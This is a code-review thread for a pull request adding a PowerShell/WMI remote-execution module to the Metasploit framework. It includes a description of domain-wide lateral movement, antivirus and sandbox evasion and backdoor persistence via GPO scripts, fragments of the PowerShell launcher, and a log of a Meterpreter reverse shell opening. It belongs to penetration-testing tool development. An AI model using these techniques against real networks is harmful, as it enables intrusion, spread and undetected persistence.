### PR TITLE
Powershell WMI execution post module

### PR DESCRIPTION
**Pull request by sempervictus**
Powerhell provides direct interface to WMI, allowing users in UAC
or otherwise restricted context to attain privileged resources via
impersonation. Moreover, WMI allows for execution remotely, on any
endpoint attainable via DCOM. In practice, this allows foothold on
a single domain host to immediately infect every machine accessible
via DCOM either from the currently held privileged context (such as
a domain administrator) or from a new context generated by entering
acquired credentials.
Payloads, remote commands, and collection activities can be invoked
without direct IP connectivity on a remote host, and output can
be collected the same way.
Of particular note when implementing this technique is that admin
contexts resulting from this form of execution are not encapsulated
in UAC, allowing for immediate privesc to system if creating a new
session.
Old notes show that loopback exec is not stable or usable, though
this merits further research as it seems the native way to avoid
UAC altogether without any exploitation.
As with all the other powershell vectors, this mechanism provides
in-memory execution, and in all our testing walks right through the
AV currently out there since it has no service executable, on-disk
footprint, or even error log from the improper service exit that
psexec causes. Sandboxes dont cover powershell - too much runtime
entropy and some quite legitimate use of sockets and unmanaged
memory marshalling to get a good "guess" of what the code is trying
to do.
Makes for a great gift left behind in GPO startup scripts or other
latent backdoor approaches. Since a script is produced, those with
the need and craft can alter the resulting scripts to dynamically
enumerate domain hosts meeting their needs for exploitation at
runtime, as opposed to the "brute-force" approach used here.

---

Testing:
  The internal module has been in use for over three years in our
fork. Its been instrumental in showing several clients what it
means to be "pwned" in 30s flat. This particular version has been
slightly altered for upstream consumption and should be tested
again by community and developers alike in the upstream branch.

Note:
  Word to the wise on target selection - choose carefully, it is
possible to generate more sessions than an L3 pivoted handler can
comfortably address, and having a thousand reverse_tcp sessions
going past the edge is sure to raise an eyebrow at the SOC.

### CODE REVIEW

File: modules/exploits/windows/local/ps_wmi_exec.rb [hunk 1]
```diff
@@ -0,0 +1,184 @@
...
+        OptString.new('PASSWORD', [false, "Password to authenticate with"]),
+        OptString.new('DOMAIN', [false, "Domain or machine name"]),
+
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
+        OptBool.new('RUN_REMOTE_WOW64', [
+          false,
```
Comment (void-in) [inline modules/exploits/windows/local/ps_wmi_exec.rb]: The advanced options should be camel style.

File: modules/exploits/windows/local/ps_wmi_exec.rb [hunk 2]
```diff
@@ -0,0 +1,184 @@
...
+
+    # Make sure we meet the requirements before running the script
+    # Shell sessions can't kill PIDs
+    if !(session.type == "meterpreter" || have_powershell?)
+      print_error("Incompatible Environment")
+      return
+    end
+    # SYSTEM doesnt have credentials on remote hosts
+    if is_system? and datastore['RHOSTS']
+      print_error("Cannot run as system")
```
Comment (void-in) [inline modules/exploits/windows/local/ps_wmi_exec.rb]: Perhaps automigrate to a user process here?

File: modules/exploits/windows/local/ps_wmi_exec.rb [hunk 3]
```diff
@@ -0,0 +1,184 @@
...
+    end
+    return script
+  end
+
+  def exploit
+
+    # Make sure we meet the requirements before running the script
+    # Shell sessions can't kill PIDs
+    if !(session.type == "meterpreter" || have_powershell?)
+      print_error("Incompatible Environment")
```
Comment (void-in) [inline modules/exploits/windows/local/ps_wmi_exec.rb]: Why are we checking ```session.type == "meterpreter"``` here when ```SessionType => ['meterpreter']``` have been declared above? I believe that check won't let this module run on anything other than meterpreter.

**Comment by void-in** [comment]
@sempervictus Excellent work. Travis is unhappy because you have used a very old template containing the old metasploit licensing and link stuff. That is easy to fix.

One other observation. A module that takes RHOSTS and give sessions back, does it qualify as a local exploit module?

File: modules/exploits/windows/local/ps_wmi_exec.rb (hunk 1 above)
Comment (sempervictus) [inline modules/exploits/windows/local/ps_wmi_exec.rb]: Addressing, sorry, this is old old code

File: modules/exploits/windows/local/ps_wmi_exec.rb (hunk 2 above)
Comment (sempervictus) [inline modules/exploits/windows/local/ps_wmi_exec.rb]: When this was written, that wasn't very stable. I'll look around at how others do it.

File: modules/exploits/windows/local/ps_wmi_exec.rb (hunk 3 above)
Comment (sempervictus) [inline modules/exploits/windows/local/ps_wmi_exec.rb]: Copy pasta, addressing.

**Comment by sempervictus** [comment]
I dont know if we had local exploits back then... but yes, it does, though you can actually execute just about anything this way, its implemented as a local exploit, so yes, lets move it.

**Comment by void-in** [comment]
@sempervictus My understanding of the local exploit is that it would run on the local machine and will be used for privilege escalation. The key here is the "local" part. A module that takes RHOSTS is by definition run other hosts. 

I am not saying your choice was incorrect in implementing it as a local exploit as I looked around and couldn't figure out where this would fit. Just wanted to get your opinion about the RHOSTS vs local thing.

**Comment by sempervictus** [comment]
Looks like i have this wired to be dependent on #5393 but i'm not sure if the export version needs that linkage since i stripped the option to create a binary which does this in .NET (was having some issues with the port code). I'll drop the dep from this PR unless someone wants to merge that one...

@void-in: I think this was a topic of discussion when we were first moving to the concept of local exploits, and we couldn't figure out how to place it then either - it has to be a post module, but its a remote exploit. Its why i started working on proper DCOM in Rex...

File: modules/exploits/windows/local/ps_wmi_exec.rb (hunk 2 above)
Comment (OJ) [inline modules/exploits/windows/local/ps_wmi_exec.rb]: I'm personally not a fan of automigration in such contexts. If you must add such a thing, make it an option please!

File: modules/exploits/windows/local/ps_wmi_exec.rb [hunk 4]
```diff
@@ -0,0 +1,183 @@
...
+  end
+
+  def exploit
+
+    # Make sure we meet the requirements before running the script
+    # Shell sessions can't kill PIDs
+    if !have_powershell?
+      print_error("Incompatible environment - PowerShell is required")
+      return
+    end
```
Comment (OJ) [inline modules/exploits/windows/local/ps_wmi_exec.rb]: To make it more MSF-y, perhaps something like...
``` ruby
unless have_powershell?
  fail_with(Failure::BadConfig, 'PowerShell not found')
end
```

File: modules/exploits/windows/local/ps_wmi_exec.rb (hunk 2 above)
Comment (OJ) [inline modules/exploits/windows/local/ps_wmi_exec.rb]: would prefer `fail_with` here too?

File: modules/exploits/windows/local/ps_wmi_exec.rb [hunk 5]
```diff
@@ -0,0 +1,183 @@
...
+    ps_wrapper = <<EOS
+Function New-RemoteProcess {
+    Param([string]$rhost,[string]$cmd,[string]$login,[string]$pass)
+    $ErrorActionPreference="SilentlyContinue"
+  $proc = [WMIClass]"\\\\$rhost\\root\\cimv2:Win32_Process"
+EOS
+  if opts[:username] and opts[:password]
+    ps_wrapper += <<EOS
+  $proc.psbase.Scope.Options.userName = $login
+  $proc.psbase.Scope.Options.Password = $pass
```
Comment (OJ) [inline modules/exploits/windows/local/ps_wmi_exec.rb]: Minor indentation issue here.

**Comment by wchen-r7** [comment]
Ok, so this works for me:

```
msf exploit(ps_wmi_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:5555 
[*] Running Locally
[+] Compressed size: 5344
[*] Sending stage (957999 bytes) to 192.168.146.178
[*] Meterpreter session 5 opened (192.168.146.1:5555 -> 192.168.146.178:49168) at 2016-11-15 15:41:39 -0600
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
```

I will review the code more before I land it. Thanks.

**Comment by wchen-r7** [comment]
# Release Notes

This module allows the attacker to execute a payload against another machine via the compromised one by using Powershell/WMI. Execution is performed in memory via psh-net, which means this module can also be used to deliver a payload with extra stealth on the compromised machine.

**Pull request merged**